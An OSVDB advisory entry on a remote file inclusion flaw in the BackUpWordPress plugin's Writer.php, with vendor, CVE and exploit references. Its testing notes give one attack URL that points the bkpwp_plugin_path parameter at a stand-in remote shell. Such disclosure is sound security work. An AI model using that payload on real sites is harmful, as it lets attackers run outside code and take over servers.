BackUpWordPress Plugin for WordPress Writer.php bkpwp_plugin_path Variable Remote File Inclusion

2007-11-01T00:00:00
ID OSVDB:38478
Type osvdb
Reporter OSVDB
Modified 2007-11-01T00:00:00

Description

Manual Testing Notes

http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?

References:

Vendor Specific News/Changelog Entry: http://wordpress.designpraxis.at/2007/11/01/security-vulnerability-in-backupwordpress/
Vendor Specific News/Changelog Entry: http://wordpress.designpraxis.at/2007/11/01/backupwordpress-security-release/
Related OSVDB ID: 38477
Related OSVDB ID: 38479
Related OSVDB ID: 38476
Generic Exploit URL: http://www.milw0rm.com/exploits/4593
FrSIRT Advisory: ADV-2007-3744
CVE-2007-5800
Bugtraq ID: 26290